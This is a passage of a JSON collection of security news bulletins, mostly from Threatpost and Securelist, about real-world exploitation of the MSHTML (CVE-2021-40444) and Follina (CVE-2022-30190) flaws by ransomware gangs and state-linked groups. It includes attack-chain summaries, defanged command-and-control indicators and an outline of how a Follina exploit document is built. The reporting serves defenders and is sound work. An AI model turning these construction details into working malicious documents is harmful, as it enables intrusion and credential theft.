goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-07T12:48:32", "description": "Researchers have added state-sponsored hackers to the list of adversaries attempting to exploit Microsoft\u2019s now-patched Follina vulnerability. According to researchers at Proofpoint, state-sponsored hackers have attempted to abuse the Follina vulnerability in Microsoft Office, aiming an email-based exploit at U.S. and E.U. government targets via phishing campaigns.\n\nProofpoint researchers spotted the attacks and believe the adversaries have ties to a government, which it did not identify. Attacks consist of campaigns targeting victims U.S. and E.U. government workers. Malicious emails contain fake recruitment pitches promising a 20 percent boost in salaries and entice recipients to download an accompanying attachment.\n\nIn a Twitter-based statement, Sherrod DeGrippo, vice president of threat research at Proofpoint, said about 10 Proofpoint customers had received over 1,000 such messages.\n\nThe malicious attachment targets the remote code execution bug [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)_, dubbed _Follina.\n\n[Discovered](<https://twitter.com/nao_sec/status/1530196847679401984>) last month, the flaw exploits the Microsoft Windows Support Diagnostic Tool. As Microsoft explained in a [blog post](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), the bug \u201cexists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nState-sponsored abuse of the flaw is just the latest in a string of Follina-related attacks.\n\nIf successfully exploited, attackers can use the Follina flaw to install programs, view, change or delete data, or create new accounts in the context allowed by the user\u2019s rights, the company said.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 and patched by Microsoft in May.\n\nProofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and \u201csteals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.\u201d\n\nProofpoint explained in a tweet, \u201cThe extensive reconnaissance conducted by [a] second Powershell script demonstrated an actor interested in a large variety of software on a target\u2019s computer.\u201d It is that behavior that raised concerns that the campaign had ties to a \u201cstate aligned nexus,\u201d researchers noted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T12:45:00", "type": "threatpost", "title": "Follina Exploited by State-Sponsored Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:45:00", "id": "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "href": "https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T12:27:08", "description": "Advanced persistent threat group Fancy Bear is behind a [phishing campaign](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.\n\nThe attacks by the Russia-linked APT are tied the Russian and Ukraine war, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for [Follina](<https://threatpost.com/microsoft-workaround-0day-attack/179776/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)), a known Microsoft one-click flaw, according to a [blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) published this week.\n\nOn June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first [reported by Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). Google\u2019s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in the Ukraine.\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) [also independently discovered](<https://cert.gov.ua/article/341128>) the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.\n\n## **Bear on the Loose**\n\nCERT-UA [previously identified](<https://threatpost.com/cyberwar-ukraine-military/179421/>) Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating on the behest of Russian intelligence to gather info that would be useful to the agency.\n\nIn the past Fancy Bear has been linked in attacks targeting elections [in the United States](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) and [Europe](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>), as well as [hacks against sporting and anti-doping agencies](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) related to the 2020 Olympic Games.\n\nResearchers first flagged Follina in April, but [only in May](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they\u2019re opened.\n\nThe bug is dangerous for a number of reasons\u2013not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.\n\nMicrosoft recently patched Follina in its [June Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) release but it remains [under active exploit](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) by threat actors, including known APTs.\n\n**Threat of Nuclear Attack**\n\nFancy Bear\u2019s Follina campaign targets users with emails carrying a malicious RTF file called \u201cNuclear Terrorism A Very Real Threat\u201d in an attempt to prey on victims\u2019 fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an [article](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.\n\nThe malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268[.]frge[.]io/article[.]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.\n\nThe PowerShell loads the final payload\u2013a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in the Ukraine. While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.\n\nIn other functionality, the recently seen variant is \u201calmost identical\u201d to the earlier one, \u201cwith just a few minor refactors and some additional sleep commands,\u201d they added.\n\nAs with the previous variant, the stealer\u2019s main pupose is to steal data\u2014including website credentials such as username, password and URL\u2013from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did but this time to a different domain, researchers said.\n\n\u201cThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data,\u201d they wrote. \u201cThe new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\u201d\n\nThe owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-23T12:21:33", "type": "threatpost", "title": "Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-23T12:21:33", "id": "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "href": "https://threatpost.com/fancy-bear-nuke-threat-lure/180056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-06-08T07:56:31", "description": "\n\nAt the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).\n\n## CVE-2022-30190 technical details\n\nBriefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (_**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The data used to describe the link is placed in the **** tag with attributes _**Type=&quot;http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject&quot;, Target=&quot;http_malicious_link!&quot;**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme. \nWhen opened, the attacker-created document runs MSDT. The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim&#x27;s system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled. \nAt the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document \u2014 just previewing it in Windows Explorer is enough.\n\n## Protecting against 